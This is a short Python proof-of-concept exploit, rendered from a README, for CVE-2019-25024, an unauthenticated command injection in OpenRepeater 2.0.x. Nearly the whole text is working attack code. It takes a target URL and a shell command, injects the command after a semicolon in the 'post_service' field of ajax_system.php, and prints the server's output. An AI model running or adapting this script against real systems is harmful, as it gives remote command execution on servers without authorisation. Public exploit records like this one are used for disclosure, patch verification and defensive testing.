README.md
Rendering markdown...
#!/usr/bin/env python3.8
# Title: OpenRepeater (ORP) / Unauthenticated Command Injection
# Date: 06/02/2019
# Discovered by: @codexlynx
# Software homepage: openrepeater.com
# Software version: Affected 2.0.x, Fixed 2.2.x
# CVE ID: CVE-2019-25024
# Category: php, web, rce
import urllib.request
import urllib.parse
import sys
AJAX_SYSTEM_PATH = "openrepeater/functions/ajax_system.php"
if len(sys.argv) < 3:
print("Usage: %s <scheme>://<address> <command>" % sys.argv[0])
sys.exit(1)
url = "%s/%s" % (sys.argv[1], AJAX_SYSTEM_PATH)
post_data = urllib.parse.urlencode({"post_service": ";%s" % sys.argv[2]})
req = urllib.request.urlopen(url, data=post_data.encode("ascii"))
output = req.read()
print(output.decode("utf-8"))